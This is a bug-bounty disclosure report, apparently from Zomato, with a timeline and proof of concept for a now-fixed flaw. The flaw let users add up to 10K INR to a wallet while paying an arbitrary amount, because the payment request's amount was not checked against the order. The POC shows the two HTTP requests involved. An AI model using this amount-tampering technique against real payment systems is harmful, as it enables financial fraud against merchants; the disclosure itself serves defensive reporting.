Add upto 10K rupees to a wallet by paying an arbitrary amount

| TimeStamp | Action | |----------|:-------------:| | Wed, 24 Nov 2021, 11:24 IST | Received the report | | Wed, 24 Nov 2021, 11:25 IST | Validation and analysis of issue initiated | | Wed, 24 Nov 2021, 11:28 IST | Vulnerability reported to the respective Internal Team | | Wed, 24 Nov 2021, 11:36 IST | The authenticity of the issue is verified by the Security Team | | Wed, 24 Nov 2021, 11:41 IST | Report Triaged | | Wed, 24 Nov 2021, 14:47 IST | Fix Deployed on Production | | Wed, 24 Nov 2021, 14:48 IST | Severity adjusted to High (7.5 CVSS) by Security Team | | Wed, 24 Nov 2021, 15:47 IST | Fix verified by the Security Team | | Wed, 24 Nov 2021, 16:00 IST | Fix acknowledged by the respective Internal Team | | Wed, 24 Nov 2021, 16:09 IST | Minimum Bounty awarded to the researcher | | Wed, 24 Nov 2021, 16:28 IST | The researcher confirmed the fix | | Wed, 24 Nov 2021, 23:15 IST | Full bounty + bonus awarded to the researcher | ## Summary: Thanks to @ashoka_rao for reporting the issue. The researcher demonstrated a way to add any amount (upto 10k) to Zomato wallet without paying the amount in full and by paying an arbitrary amount. Other Payment methods and consumers including online ordering were not vulnerable to this. ## POC: The addition to the Zomato wallet happens in a two-step process. 1. Generate the Order Request for Addition: ```bash POST /gw/payments/zomato_money/order {"country_id":"1","service_type":"ZM_RECHARGE","cart":"null","amount":"1000.0"} ``` Response: ```bash {"order_id": "XXXX"} ``` 2. Complete the Payment against the order request: ```bash POST /v2/sdk/make_payment amount=XX&order_id=XXX&order_type=ZM_RECHARGE ``` The amount requested to generate the `order_id - XXXX` was `1000` but while paying one could have passed an arbitrary amount instead of `1000` against the `order_id`, which was not cross-checked. So one could have generated an order for the amount of `1000` while paying an arbitrary amount against the order and still get the entire amount defined in order added to your wallet (limited to 10K INR).